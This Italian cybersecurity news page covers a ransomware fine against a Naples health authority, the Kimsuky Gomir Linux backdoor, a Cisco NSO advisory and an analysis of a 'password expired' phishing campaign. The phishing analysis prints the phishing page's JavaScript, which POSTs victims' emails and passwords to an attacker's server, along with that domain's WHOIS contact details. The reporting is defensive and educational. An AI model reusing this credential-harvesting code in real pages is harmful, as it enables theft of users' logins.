Sicurezza Informatica
Asl napoletana multata per data breach dopo attacco ransomware
Tempo di lettura: < 1 minuto. Una Asl di Napoli è stata multata dal Garante privacy per non aver protetto adeguatamente i dati personali e sanitari di oltre 842.000 persone da un attacco ransomware.
Il Garante privacy ha inflitto una sanzione di 30.000 euro a una Asl di Napoli per non aver adeguatamente protetto i dati personali e sanitari di oltre 842.000 individui da attacchi hacker.
Dettagli dell’attacco
La struttura sanitaria è stata vittima di un attacco ransomware. Un virus ha limitato l’accesso al database della struttura e ha richiesto un riscatto per ripristinare il funzionamento dei sistemi. Conformemente alla normativa sulla protezione dei dati personali, l’Asl ha segnalato il data breach al Garante, che ha avviato un’indagine per esaminare le misure tecniche e organizzative implementate dalla struttura sia prima che dopo l’attacco.
Criticità riscontrate
L’indagine del Garante ha rivelato diverse gravi carenze. Tra queste, l’assenza di misure adeguate per identificare tempestivamente le violazioni dei dati personali e per garantire la sicurezza delle reti. Questo ha violato il principio della “privacy by design”. L’accesso alla rete tramite VPN avveniva solo attraverso un processo di autenticazione basato su username e password. Inoltre, la mancanza di segmentazione delle reti ha permesso al virus di diffondersi in tutta l’infrastruttura informatica.
Decisione del Garante
Nel determinare la sanzione, il Garante ha considerato la gravità del data breach, che ha coinvolto dati sensibili relativi alla salute di un vasto numero di persone. Tuttavia, è stato anche preso in considerazione l’approccio non intenzionale e collaborativo dell’Asl. Dopo l’incidente, l’Asl ha implementato diverse misure per mitigare il danno e ridurre la probabilità di futuri attacchi. Queste misure includono l’introduzione di un accesso VPN con autenticazione a doppio fattore.
Sicurezza Informatica
Kimsuky lancia Gomir: backdoor Linux tramite installer trojanizzati
Tempo di lettura: 2 minuti. Kimsuky distribuisce un nuovo malware Linux chiamato Gomir tramite installer trojanizzati, mirato a organizzazioni governative sudcoreane.
Il gruppo di hacker nordcoreano Kimsuky ha iniziato a distribuire un nuovo malware Linux chiamato Gomir, una variante del backdoor GoBear, tramite installer di software trojanizzati. Questo attacco è mirato a organizzazioni governative sudcoreane, utilizzando software apparentemente legittimi per infettare i sistemi target.
Dettagli della backdoor Gomir
Gomir condivide molte somiglianze con il backdoor GoBear, offrendo comunicazione diretta con il server di comando e controllo (C2), meccanismi di persistenza e supporto per una vasta gamma di comandi. Dopo l’installazione, il malware verifica il valore del gruppo ID per determinare se viene eseguito con privilegi di root. Si copia poi in /var/log/syslogd
per garantire la persistenza.
Meccanismi di persistenza
Per mantenere la sua esecuzione, Gomir crea un servizio systemd
chiamato “syslogd” e configura un comando crontab
per l’esecuzione al riavvio del sistema. Queste azioni garantiscono che il malware continui a funzionare anche dopo il riavvio del sistema.
Funzionalità di Gomir
Gomir supporta 17 operazioni diverse, attivate quando il comando corrispondente viene ricevuto dal server C2 tramite richieste HTTP POST. Queste operazioni includono:
- Esecuzione di comandi shell arbitrari.
- Raccolta di informazioni sul sistema, come hostname, nome utente, CPU, RAM e interfacce di rete.
- Creazione di file arbitrari sul sistema.
- Esfiltrazione di file dal sistema.
- Configurazione di un proxy inverso per connessioni remote.
Metodo di attacco
Gli attacchi di Kimsuky sfruttano versioni trojanizzate di vari software, come TrustPKI e NX_PRNMAN di SGA Solutions, e Wizvera VeraPort, per infettare i target con Troll Stealer e il malware GoBear per Windows. Symantec ha rilevato che gli attacchi di Kimsuky sembrano preferire metodi di supply-chain, utilizzando installer compromessi per massimizzare le possibilità di infezione.
Obiettivi e indicatori di compromissione
Gli attacchi sono stati progettati con cura per colpire specificamente obiettivi sudcoreani, scegliendo software comunemente utilizzati in Corea del Sud. Il rapporto di Symantec fornisce un elenco di indicatori di compromissione per diversi strumenti malevoli osservati nella campagna, inclusi Gomir, Troll Stealer e il dropper GoBear.
La scoperta di Gomir evidenzia l’evoluzione continua delle tecniche di attacco del gruppo Kimsuky, che continua a rappresentare una minaccia significativa per la sicurezza informatica, in particolare per le organizzazioni governative. La comunità della sicurezza deve rimanere vigile e adottare misure preventive per proteggere i propri sistemi da questi attacchi sofisticati.
Sicurezza Informatica
Vulnerabilità privilegi in Cisco Crosswork Network Services Orchestrator
Tempo di lettura: < 1 minuto. Cisco rilascia aggiornamenti software per correggere una vulnerabilità di escalation dei privilegi nel Cisco Crosswork Network Services Orchestrator
Cisco ha rilasciato aggiornamenti software gratuiti che affrontano una vulnerabilità di escalation dei privilegi nel Cisco Crosswork Network Services Orchestrator (NSO). Questa vulnerabilità potrebbe consentire a un attaccante autenticato di eseguire comandi arbitrari con privilegi elevati su un sistema interessato.
Descrizione della Vulnerabilità
La vulnerabilità si trova nel modulo Tail-f HCC Function Pack di Cisco Crosswork NSO e riguarda versioni specifiche del software. Gli aggiornamenti software rilasciati correggono questa falla, prevenendo l’uso non autorizzato di comandi con privilegi elevati.
Versioni interessate e correzioni disponibili
Cisco consiglia agli utenti di aggiornare il software alle seguenti versioni fisse:
Release Cisco Crosswork NSO | Prima Release Fissa Tail-f HCC Function Pack |
---|---|
5.0 e versioni successive | 5.0.5 |
6.0 e versioni successive | 6.0.2 |
Aggiornamenti e Supporto
I clienti con contratti di servizio che includono aggiornamenti software regolari possono ottenere le correzioni di sicurezza attraverso i canali di aggiornamento consueti. I clienti devono assicurarsi che i dispositivi da aggiornare abbiano memoria sufficiente e che le configurazioni hardware e software attuali siano supportate dalla nuova release.
Clienti senza Contratti di Servizio
I clienti che acquistano direttamente da Cisco ma non dispongono di un contratto di servizio e quelli che acquistano tramite venditori terzi ma non riescono a ottenere il software corretto attraverso il loro punto vendita, devono contattare il Cisco TAC. È consigliato avere a disposizione il numero di serie del prodotto e fornire l’URL di questo avviso come prova del diritto a un aggiornamento gratuito.
Informazioni aggiuntive
Per ulteriori informazioni sulla vulnerabilità e le soluzioni di aggiornamento, è possibile consultare la pagina degli avvisi di sicurezza di Cisco.
Sicurezza Informatica
La tua password è scaduta: nuova ondata di attacchi phishing
Tempo di lettura: 4 minuti. Il phishing è una tecnica utilizzata dai criminali informatici per ottenere informazioni personali, come password, numeri di carte di credito e dati finanziari, fingendosi di essere entità affidabili.
Introduzione: Gli attacchi di phishing sono una minaccia sempre più diffusa nel mondo digitale. Con l’aumento dell’uso di Internet e delle comunicazioni via email, i cybercriminali trovano sempre nuovi modi per ingannare le persone e rubare informazioni sensibili. In questo articolo, esploreremo cos’è il phishing, come funziona e come puoi proteggerti da esso.
Cos’è il Phishing: Il phishing è una tecnica utilizzata dai criminali informatici per ottenere informazioni personali, come password, numeri di carte di credito e dati finanziari, fingendosi di essere entità affidabili. Questi truffatori inviano email o messaggi che sembrano provenire da aziende o istituzioni legittime, come banche, social network o siti di e-commerce, al fine di ingannare le vittime e convincerle a fornire le proprie informazioni.
Come Funziona il Phishing: Gli attacchi di phishing possono assumere diverse forme, ma generalmente seguono un processo simile:
- Email di Phishing: Il truffatore invia un’email che sembra provenire da un’azienda conosciuta, chiedendo alla vittima di fornire informazioni personali o di fare clic su un link fraudolento.
- Link Fraudolenti: Il messaggio di phishing contiene un link che porta a una pagina web contraffatta che sembra autentica. Questa pagina può chiedere di accedere al tuo account o di inserire informazioni sensibili.
- Raccolta di Dati: Una volta che la vittima fornisce le informazioni richieste, i truffatori le utilizzano per rubare denaro, identità o altre informazioni sensibili.
Un caso reale di attacco
Questo che segue è un esempio di email ricevuta in una mia casella di posta elettronica. Siccome sono il provider di me stesso è stato subito evidente che si trattasse di un tentativo di phishing:
Il messaggio è in inglese, ed è stato ricevuto da migliaia di utenti che sono stati avvisati del fatto che la loro password era scaduta e che se non si fosse seguito il link il loro account sarebbe stato sospeso.
Io ovviamente ho seguito il link, e la pagina che mi è comparsa è questa:
La prima cosa che possiamo notare è come viene generata una finta pagina di accesso alla email con il nome estratto dal dominio della vittima ed in alcuni casi anche l’icona presa dal sito.
Non è molto complicato generare una pagina del genere, tutte le informazioni sono contenute nell’indirizzo email del malcapitato.
Inserendo la propria password questa viene inviata al server dell’hacker ed archiviata.
Come hanno fatto a trovare la mia email?
Prima di procedere a questo attacco gli hacker fanno una scansione del web, cercando in tutti i siti, forum pubblici, profili social e raccolgono milioni di email.
Successivamente vengono inviate le email e si aspettano gli utenti che “abboccano”
Il sito che viene presentato ha questo indirizzo URL
La pagina è ospitata su un gateway IPFS di CloudFlare.
Cosa è un server IPFS?
Un IPFS gateway funge da intermediario tra la rete IPFS decentralizzata e il World Wide Web tradizionale, consentendo agli utenti di accedere ai contenuti IPFS tramite il web utilizzando URL standard. Ciò rende i contenuti IPFS accessibili a una più ampia base di utenti e facilita l’integrazione dei contenuti IPFS con le applicazioni web esistenti.
In pratica l’origine del contenuto non è facilmente rintracciabile perchè schermata dal gateway.
Analisi del codice della pagina di phishing
Analizzando il codice della pagina è possibile vedere dove vengono inviati i dati raccolti in maniera fraudolenta.
$.ajax({
dataType: 'JSON',
url: 'https://winnersolution.us/TWE/gen.php',
type: 'POST',
data:{
email:email,
password:password,
},
Questo è un pezzo di codice presente nello JavaScript della pagina. Senza scendere nel tecnico, il contenuto del form (la nostra email e la password che abbiamo inserita) viene trasmesso ad uno script ospitato sul dominio “winnsersolution.us” che è un dominio gratuito registrato sul provider NameCheap ed ovviamente non intestato a nessuno.
Admin Name: Ego Mbute
Admin Organization: fiko
Admin Street: 95485085 jfkkf ltd
Admin Street: 95485085 jfkkf ltd
Admin Street:
Admin City: New York
Admin State/Province: NY
Admin Postal Code: 10010
Admin Country: US
Admin Phone: +1.480480883
Admin Phone Ext:
Admin Fax: +1.9484894494
Admin Fax Ext:
Admin Email: ashley.treasurecn@gmail.com
Cosa abbiamo trovato nel server degli hacker?
Abbiamo trovato lo stesso script “gen.php” ripetuto diverse volte ed in diverse cartelle con date che vanno dal 13 al 15 maggio 2024, questo articolo è stato scritto il 16 maggio.
Questo hacker (non molto esperto) ha appena iniziato la sua attività di attacco, ed evidentemente dopo aver raccolto le email dei malcapitati lascerà scadere il dominio è l’hosting e passerà ad una nuova fase di attacco.
Abbiamo rintracciato il server che ha inviato l’email
Nei file log del server di posta elettronica siamo riusciti a trovare l’indirizzo del server che ha originato il messaggio fraudolento.
Il server ed il dominio ( jpcompaniesinc.com ) appartengono ad una azienda che molto probabilmente è stata hackerata in precedenza, e la loro casella di posta utilizzata per inviare altri messaggi.
Come Proteggerti dal Phishing: Proteggerti dagli attacchi di phishing è essenziale per mantenere al sicuro le tue informazioni. Ecco alcuni consigli utili:
- Verifica l’Autenticità: Controlla attentamente l’indirizzo email del mittente e verifica se corrisponde all’azienda o all’istituzione che dice di essere.
- Attenzione ai Link: Non fare clic su link sospetti presenti nelle email. Se devi accedere a un sito web, digita direttamente l’URL nella barra degli indirizzi del tuo browser.
- Non Condividere Informazioni Sensibili: Mai fornire password, numeri di carte di credito o altri dati sensibili tramite email, soprattutto se richiesto in modo non sollecitato.
- Utilizza Soluzioni di Sicurezza: Installa e aggiorna regolarmente un buon software antivirus e antimalware sul tuo computer e dispositivo mobile.
- Sii Consapevole: Sviluppa una consapevolezza delle pratiche di sicurezza online e educa te stesso e i tuoi dipendenti o familiari su come riconoscere e evitare gli attacchi di phishing.
- L'Altra Bolla1 settimana fa
Jack Dorsey getta la spugna e lascia Bluesky
- Inchieste1 settimana fa
Perchè il motore di ricerca OpenAI fa paura ai giornalisti?
- L'Altra Bolla1 settimana fa
Meta arriva l’intelligenza artificiale per la Pubblicità
- L'Altra Bolla1 settimana fa
TikTok: azione legale contro Stati Uniti per bloccare il divieto
- L'Altra Bolla1 settimana fa
Meta testa la condivisione incrociata da Instagram a Threads
- L'Altra Bolla1 settimana fa
X sotto indagine dell’Unione Europea
- Robotica5 giorni fa
Come controllare dei Robot morbidi ? MIT ha un’idea geniale
- Smartphone1 settimana fa
Xiaomi 14 e 14 Ultra, problemi di condensa nelle fotocamere